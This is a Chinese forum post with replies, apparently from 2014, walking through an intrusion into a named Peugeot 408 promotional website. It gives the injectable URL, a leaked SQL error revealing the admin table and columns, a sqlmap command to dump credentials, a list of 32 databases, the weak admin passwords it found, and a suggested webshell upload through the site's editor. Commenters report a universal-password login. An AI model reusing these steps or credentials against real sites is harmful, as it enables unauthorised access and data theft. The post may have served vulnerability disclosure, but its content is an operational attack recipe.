东风标致408打入后台可脱裤

凡火火。

#01 注入 还是原洞主的注入点可以用 <code>http://408.peugeot.com.cn/show.php?cid=57</code> 注入点可以直接用，但如果提交这个不就重复了吗？我们要的是别的思路
#02盲注 我们登录后台（怎么找到的？当然是猜的） 看到一个比较格录的……（今天看pkav的教程时候想到了后台注入） 然后试一下 admin' admin 结果就报错了……很遗憾没有物理路径，要不然配合原洞主的注入就可以sqlmap写shell了。 后台注入到此为止吧……我也不太擅长手工，但是从这里我们发现了一些信息
<code>Database error: Invalid SQL: SELECT id FROM `p_admin` WHERE username = 'admin'' AND password = 'admin' AND stat = 1 MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin' AND stat = 1' at line 1) Session halted.</code>
数据库类型mysql
密码表名 p_admin
用户名字段：username
密码字段：password
物理路径还是无法获得。
#03 脱裤 sqlmap不解释……估计前洞主没有列数据库，要不然会发现整个主站都是在同一个mysql里 一共32个库，可以脱裤
<code>available databases [32]:
[*] 2014happy
[*] 24hours
[*] 3015db
[*] 308
[*] 308powertogo
[*] 50db
[*] biaozhidashisai
[*] happy3008 [*] hei3008 [*] hobby [*] information_schema [*] lemans [*] mysql [*] performance_schema [*] peugeot301 [*] peugeot408 [*] peugeot_2008_m [*] peugeot_3008 [*] peugeot_3008_1year [*] peugeot_3008_1year_m [*] peugeot_3008_3D [*] peugeot_3008_happy [*] peugeot_408_jy [*] peugeot_408im [*] peugeot_club_35group_2 [*] peugeot_cn [*] puzzlegame [*] rcz [*] sport [*] team [*] test [*] zhengyan
</code>
我们根据经验判断是peugeot408这个表，然后表段和字段我们在第二部里都知道了，就直接构造语句 <code> # Sqlmap -u http://408.peugeot.com.cn/show.php?cid=57 -D peogeot40 8 -T p_admin -C username,password --dump </code> 我们发现竟然是弱口令…… admin 408408 test test 继续成功登陆后台
#04 猜想 后台存在kindeditor编辑器，可直接上传，审查元素获得webshell

2863482451

pkav的教程求分享，谢谢

testKai

2863482451 发表于 2014-7-29 21:08
pkav的教程求分享，谢谢

http://drops.wooyun.org/tips/2671

dnygs08

太牛了……

nerd

试了下，万能密码可进后台

广岛秋泽

谢谢分享~               

ztaosony

来看看什么注入

2863482451

testKai 发表于 2014-7-30 09:10
http://drops.wooyun.org/tips/2671

谢谢！

csadsl

这个比较的屌

小民

无意的注入还挺搞笑的